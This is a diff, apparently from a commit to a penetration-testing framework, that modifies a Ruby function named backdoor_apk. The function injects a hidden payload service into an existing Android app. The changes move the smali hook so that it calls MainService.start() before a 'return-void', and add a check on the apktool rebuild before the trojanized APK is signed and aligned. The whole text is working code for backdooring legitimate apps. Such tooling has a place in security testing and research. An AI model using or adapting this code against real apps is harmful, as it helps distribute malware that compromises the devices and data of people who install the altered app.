@@ -198,12 +198,12 @@ def backdoor_apk(apkfile, raw_payload)
198198 end
199199
200200 unless activitysmali
201- raise RuntimeError , "Unable to find hook point in #{ smalifiles } \n "
201+ raise RuntimeError , "Unable to find hookable activity in #{ smalifiles } \n "
202202 end
203203
204- entrypoint = ';->onCreate(Landroid/os/Bundle;)V '
204+ entrypoint = 'return-void '
205205 unless activitysmali . include? entrypoint
206- raise RuntimeError , "Unable to find onCreate() in #{ smalifile } \n "
206+ raise RuntimeError , "Unable to find hookable function in #{ smalifile } \n "
207207 end
208208
209209 # Remove unused files
@@ -226,10 +226,10 @@ def backdoor_apk(apkfile, raw_payload)
226226 File . open ( newfilename , "wb" ) { |file | file . puts newsmali }
227227 end
228228
229- payloadhook = entrypoint + %Q^
230- invoke-static {p0}, L #{ package_slash } /MainService;->startService(Landroid/content/Context;)V
231- ^
232- hookedsmali = activitysmali . gsub ( entrypoint , payloadhook )
229+ payloadhook = %Q^invoke-static {}, L #{ package_slash } /MainService;->start()V
230+
231+ ^ + entrypoint
232+ hookedsmali = activitysmali . sub ( entrypoint , payloadhook )
233233
234234 print_status "Loading #{ smalifile } \n "
235235 File . open ( smalifile , "wb" ) { |file | file . puts hookedsmali }
@@ -241,6 +241,10 @@ def backdoor_apk(apkfile, raw_payload)
241241
242242 print_status "Rebuilding #{ apkfile } #{ injected_apk } \n "
243243 run_cmd ( "apktool b -o #{ injected_apk } #{ tempdir } )
244+ unless File . readable? ( injected_apk )
245+ raise RuntimeError , "Unable to rebuild apk with apktool"
246+ end
247+
244248 print_status "Signing #{ injected_apk } \n "
245249 run_cmd ( "jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore #{ keystore } #{ storepass } #{ keypass } #{ injected_apk } #{ keyalias } )
246250 print_status "Aligning #{ injected_apk } \n "
0 commit comments